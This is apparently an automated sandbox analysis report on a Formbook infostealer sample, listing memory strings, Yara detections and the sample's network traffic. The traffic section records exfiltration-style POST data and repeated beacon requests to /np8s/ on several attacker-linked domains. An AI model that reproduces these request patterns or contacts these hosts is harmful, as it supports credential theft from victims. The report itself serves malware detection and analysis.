Source: explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: explorer.exe, 00000003.00000000.451381452.0000000008246000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
Source: explorer.exe, 00000003.00000000.451381452.0000000008246000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.450826772.00000000080FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
Source: explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: explorer.exe, 00000003.00000000.462438862.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.484235520.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: explorer.exe, 00000003.00000000.462438862.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.484235520.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1#
Source: explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=16c
Source: explorer.exe, 00000003.00000000.462438862.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.484235520.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1rdw
Source: wscript.exe, 00000004.00000002.928057135.0000014D0BB43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.856381747.0000014D0BB63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931546751.0000020FBE910000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/j
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png780-3
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngT
Source: explorer.exe, 00000003.00000000.450958349.0000000008183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428253369.0000000008183000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: explorer.exe, 00000003.00000000.446812221.00000000060FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.476632514.00000000060FE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0&
Source: explorer.exe, 00000003.00000000.446812221.00000000060FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.476632514.00000000060FE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0BW
Source: explorer.exe, 00000003.00000000.476750863.0000000006153000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.446911771.0000000006153000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.namebrightstatic.com/images/bg.png)
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.namebrightstatic.com/images/error_board.png)
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.namebrightstatic.com/images/header_bg.png)
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.namebrightstatic.com/images/logo_off.gif)
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.namebrightstatic.com/images/site_maintenance.png)
Source: unknown HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.siberup.xyzConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.siberup.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.siberup.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 54 42 6a 6c 49 4a 43 7a 76 72 46 6c 48 44 46 71 44 41 63 48 44 58 65 58 65 4c 38 31 73 66 78 51 69 68 4b 71 32 4a 6a 49 56 68 44 33 37 6d 66 41 70 79 41 35 66 72 6e 43 32 53 52 33 4e 6d 6b 68 35 38 6a 34 50 53 58 42 5a 71 6f 2d 6e 54 44 61 4b 51 64 4c 72 69 34 53 47 38 72 37 75 58 72 56 4d 57 50 66 6f 4f 64 2d 30 4a 5a 48 47 6c 62 58 51 39 33 67 7a 4e 43 32 41 63 59 6e 62 6f 4e 6c 6d 56 7e 4b 6a 49 7a 47 48 7a 59 4d 77 45 30 68 44 50 6d 7a 35 71 65 5f 6f 66 58 69 42 56 76 79 52 5f 65 6f 57 48 55 31 41 58 37 43 35 49 4a 36 73 53 61 38 77 48 46 6f 42 58 67 35 57 5f 44 53 6f 73 69 78 6f 57 31 38 5a 54 69 6e 6e 48 73 48 34 62 51 53 54 58 4c 38 55 42 4a 6e 67 65 56 55 68 38 43 56 76 45 7a 36 31 63 32 44 75 62 75 6e 36 4a 44 72 65 63 43 4a 67 64 49 4b 57 61 63 53 72 51 6c 34 67 6d 41 61 36 46 76 6a 47 4b 71 62 6f 30 76 62 58 57 56 55 74 66 69 64 6c 37 76 62 41 38 4e 6b 4a 34 44 57 5a 4b 48 59 39 62 59 46 4c 41 57 4c 33 70 73 50 63 51 62 75 46 4c 4f 42 67 65 67 50 58 51 70 52 34 6b 36 6d 31 6e 49 59 44 58 6b 50 68 4c 6a 4a 58 45 59 45 33 2d 74 4c 48 6d 42 79 57 31 28 63 5a 31 6a 74 69 71 31 6b 4e 56 41 71 77 48 36 76 6a 35 7a 64 78 67 46 49 6c 4f 49 70 5a 46 32 41 73 36 34 70 30 58 37 32 6e 36 42 64 7e 47 45 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=TBjlIJCzvrFlHDFqDAcHDXeXeL81sfxQihKq2JjIVhD37mfApyA5frnC2SR3Nmkh58j4PSXBZqo-nTDaKQdLri4SG8r7uXrVMWPfoOd-0JZHGlbXQ93gzNC2AcYnboNlmV~KjIzGHzYMwE0hDPmz5qe_ofXiBVvyR_eoWHU1AX7C5IJ6sSa8wHFoBXg5W_DSosixoW18ZTinnHsH4bQSTXL8UBJngeVUh8CVvEz61c2Dubun6JDrecCJgdIKWacSrQl4gmAa6FvjGKqbo0vbXWVUtfidl7vbA8NkJ4DWZKHY9bYFLAWL3psPcQbuFLOBgegPXQpR4k6m1nIYDXkPhLjJXEYE3-tLHmByW1(cZ1jtiq1kNVAqwH6vj5zdxgFIlOIpZF2As64p0X72n6Bd~GE.
Source: unknown DNS traffic detected: queries for: dilshadkhan.duia.ro
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMEN43A2RNb83bcySA==&Eh=mhUxl HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=cDXfWuCokJFrdCwhVntnDB+RdogU7uBP5U/Sv42Lexzi+FyRpCsvSOHB1BJBbWkp2bvyU0/jbw==&Eh=mhUxl HTTP/1.1Host: www.siberup.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=Hfm8tjP++bF99H8Yixu4yiAA2pucxCUNYZIpJGNk6F/7VNXQ3kF6oq1cnnPYkdM2cMsNINi87w==&Eh=mhUxl HTTP/1.1Host: www.harmlett.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=hgAcLcCQcJ9fw2P/Tuk0sK1oy/IuL6u1zsG1wPPsT2rq6CikgixxXMntvKpZqETXTWLI6sH0ZA==&Eh=mhUxl HTTP/1.1Host: www.brandpay.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=v4u/ceKk0Zb55n135mmkOO9h9NxJ7kGAyBx+qrEyA785N/4y0zrdRsBV3cMwWbOW5k3YBKZGqA==&Eh=mhUxl HTTP/1.1Host: www.tentanguang.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=uZkZa9PDR+t76IUsjgXNksX18rdkaBR0jzgf+2QyrrE0BTZPOy5IBVEfZpo9ngwjPS7HOCJSNA==&Eh=mhUxl HTTP/1.1Host: www.localbloom.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=25I4eedf3LYXj+mrZ2jI6olVDZbg0jTgzRvorLdGhmBPpJDDPx12pMPLDd38wf67F/cvJLwRDA==&Eh=mhUxl HTTP/1.1Host: www.shcylzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&Eh=mhUxl HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz/Jz3qNJ0RZyolUFog==&Eh=mhUxl HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=upNApQGgxnIpkDsed4j6UePR+EOmKhNhiuHKrn3aPCq0+c3DSqp4vkB5DGytvWTvww8fhFgzIA==&Eh=mhUxl HTTP/1.1Host: www.waermark.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=RNX6HKFDcklLmbBc9PWX652dIgRYJcuZVnkYPjFZaGFpi0fgSjcQ52/zYZHNiyjWO0COcN7HSw==&Eh=mhUxl HTTP/1.1Host: www.vitality-patients.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMEN43A2RNb83bcySA==&Eh=mhUxl HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?aDHdzD=vpgdJ4mxrh&3fk4oN=Hfm8tjP++bF99H8Yixu4yiAA2pucxCUNYZIpJGNk6F/7VNXQ3kF6oq1cnnPYkdM2cMsNINi87w== HTTP/1.1Host: www.harmlett.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=upNApQGgxnIpkDsed4j6UePR+EOmKhNhiuHKrn3aPCq0+c3DSqp4vkB5DGytvWTvww8fhFgzIA==&aDHdzD=vpgdJ4mxrh HTTP/1.1Host: www.waermark.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&aDHdzD=vpgdJ4mxrh HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&Eh=mhUxl HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz/Jz3qNJ0RZyolUFog==&Eh=mhUxl HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: u8g48fg0phzxan.exe, 00000012.00000002.875917798.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match File source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396132606.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403282167.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.401485151.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.402063776.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED

System Summary

Source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.396132606.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.403282167.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.401485151.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
